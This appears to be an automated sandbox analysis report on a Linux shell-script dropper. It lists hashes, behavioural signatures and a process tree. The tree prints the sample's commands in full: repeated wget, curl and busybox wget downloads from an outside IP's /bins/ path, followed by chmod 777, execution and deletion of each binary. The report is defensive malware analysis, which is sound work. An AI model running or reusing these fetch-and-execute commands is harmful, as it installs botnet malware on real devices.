Analysis
max time kernel: 21s
max time network: 22s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 10-11-2024 01:00
Static task: static1
Behavioral task: behavioral1, sample 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2, sample 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh, resource debian9-armhf-20240418-en
Behavioral task: behavioral3, sample 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh, resource debian9-mipsbe-20240611-en
Behavioral task: behavioral4, sample 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh, resource debian9-mipsel-20240729-en
General
Target: 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Size: 10KB
MD5: 0aab00d4e7063c05a4a2623bcf37a039
SHA1: f155f96de5ba4dba0e81f04fc0b9739488955248
SHA256: 0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
SHA512: e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
SSDEEP: 192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 18 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod (18 instances)
pid / process: 851 chmod, 801 chmod, 827 chmod, 752 chmod, 819 chmod, 680 chmod, 721 chmod, 789 chmod, 833 chmod, 741 chmod, 773 chmod, 795 chmod, 807 chmod, 813 chmod, 839 chmod, 845 chmod, 671 chmod, 700 chmod
Executes dropped EXE 18 IoCs
Processes (ioc = dropped file, pid, process name):
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO  673  d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J  682  b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv  702  V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3  723  trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt  742  qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV  753  6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B  774  z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc  790  qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR  796  619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5  802  pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y  808  wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF  814  mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl  820  hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug  828  nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt  834  qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV  840  6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B  846  z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc  852  qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
Checks CPU configuration 1 TTPs 18 IoCs
Checks CPU information that indicates whether the system is a virtual machine.
Processes: curl (18 instances)
description / ioc / process: File opened for reading, /proc/cpuinfo, curl (18 identical rows, one per curl process)
Reads runtime system information
Processes: curl (18 instances)
description / ioc / process:
File opened for reading, /proc/self/auxv, curl (18 rows)
File opened for reading, /proc/sys/crypto/fips_enabled, curl (18 rows)
Writes file to tmp directory 18 IoCs
Malware often drops required files in the /tmp directory.
Processes: curl (18 instances)
description / ioc / process (all rows: File opened for modification, by curl):
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
Processes
Process tree (indentation = depth; each entry: PID, image, command line, then the signatures it triggered)
PID 639  /tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh  /tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
  PID 641  /bin/rm  /bin/rm bins.sh
  PID 647  /usr/bin/wget  wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
  PID 659  /usr/bin/curl  curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 668  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
  PID 671  /bin/chmod  chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
           signatures: File and Directory Permissions Modification
  PID 673  /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO  ./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
           signatures: Executes dropped EXE
  PID 674  /bin/rm  rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
  PID 675  /usr/bin/wget  wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
  PID 676  /usr/bin/curl  curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 677  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
  PID 680  /bin/chmod  chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
           signatures: File and Directory Permissions Modification
  PID 682  /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J  ./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
           signatures: Executes dropped EXE
  PID 683  /bin/rm  rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
  PID 685  /usr/bin/wget  wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
  PID 690  /usr/bin/curl  curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 696  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
  PID 700  /bin/chmod  chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
           signatures: File and Directory Permissions Modification
  PID 702  /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv  ./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
           signatures: Executes dropped EXE
  PID 703  /bin/rm  rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
  PID 705  /usr/bin/wget  wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
  PID 708  /usr/bin/curl  curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 715  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
  PID 721  /bin/chmod  chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
           signatures: File and Directory Permissions Modification
  PID 723  /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3  ./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
           signatures: Executes dropped EXE
  PID 724  /bin/rm  rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
  PID 725  /usr/bin/wget  wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 732  /usr/bin/curl  curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 739  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 741  /bin/chmod  chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: File and Directory Permissions Modification
  PID 742  /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt  ./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: Executes dropped EXE
  PID 743  /bin/rm  rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 744  /usr/bin/wget  wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 745  /usr/bin/curl  curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 746  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 752  /bin/chmod  chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: File and Directory Permissions Modification
  PID 753  /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV  ./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: Executes dropped EXE
  PID 754  /bin/rm  rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 756  /usr/bin/wget  wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 761  /usr/bin/curl  curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 768  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 773  /bin/chmod  chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: File and Directory Permissions Modification
  PID 774  /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B  ./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: Executes dropped EXE
  PID 775  /bin/rm  rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 777  /usr/bin/wget  wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 783  /usr/bin/curl  curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 788  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 789  /bin/chmod  chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: File and Directory Permissions Modification
  PID 790  /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc  ./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: Executes dropped EXE
  PID 791  /bin/rm  rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 792  /usr/bin/wget  wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
  PID 793  /usr/bin/curl  curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 794  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
  PID 795  /bin/chmod  chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
           signatures: File and Directory Permissions Modification
  PID 796  /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR  ./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
           signatures: Executes dropped EXE
  PID 797  /bin/rm  rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
  PID 798  /usr/bin/wget  wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
  PID 799  /usr/bin/curl  curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 800  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
  PID 801  /bin/chmod  chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
           signatures: File and Directory Permissions Modification
  PID 802  /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5  ./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
           signatures: Executes dropped EXE
  PID 803  /bin/rm  rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
  PID 804  /usr/bin/wget  wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
  PID 805  /usr/bin/curl  curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 806  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
  PID 807  /bin/chmod  chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
           signatures: File and Directory Permissions Modification
  PID 808  /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y  ./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
           signatures: Executes dropped EXE
  PID 809  /bin/rm  rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
  PID 810  /usr/bin/wget  wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
  PID 811  /usr/bin/curl  curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 812  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
  PID 813  /bin/chmod  chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
           signatures: File and Directory Permissions Modification
  PID 814  /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF  ./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
           signatures: Executes dropped EXE
  PID 815  /bin/rm  rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
  PID 816  /usr/bin/wget  wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
  PID 817  /usr/bin/curl  curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 818  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
  PID 819  /bin/chmod  chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
           signatures: File and Directory Permissions Modification
  PID 820  /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl  ./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
           signatures: Executes dropped EXE
  PID 821  /bin/rm  rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
  PID 822  /usr/bin/wget  wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
  PID 824  /usr/bin/curl  curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 826  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
  PID 827  /bin/chmod  chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
           signatures: File and Directory Permissions Modification
  PID 828  /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug  ./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
           signatures: Executes dropped EXE
  PID 829  /bin/rm  rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
  PID 830  /usr/bin/wget  wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 831  /usr/bin/curl  curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 832  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 833  /bin/chmod  chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: File and Directory Permissions Modification
  PID 834  /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt  ./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
           signatures: Executes dropped EXE
  PID 835  /bin/rm  rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
  PID 836  /usr/bin/wget  wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 837  /usr/bin/curl  curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 838  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 839  /bin/chmod  chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: File and Directory Permissions Modification
  PID 840  /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV  ./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
           signatures: Executes dropped EXE
  PID 841  /bin/rm  rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
  PID 842  /usr/bin/wget  wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 843  /usr/bin/curl  curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 844  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 845  /bin/chmod  chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: File and Directory Permissions Modification
  PID 846  /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B  ./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
           signatures: Executes dropped EXE
  PID 847  /bin/rm  rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
  PID 848  /usr/bin/wget  wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 849  /usr/bin/curl  curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  PID 850  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 851  /bin/chmod  chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: File and Directory Permissions Modification
  PID 852  /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc  ./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
           signatures: Executes dropped EXE
  PID 853  /bin/rm  rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
  PID 854  /usr/bin/wget  wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97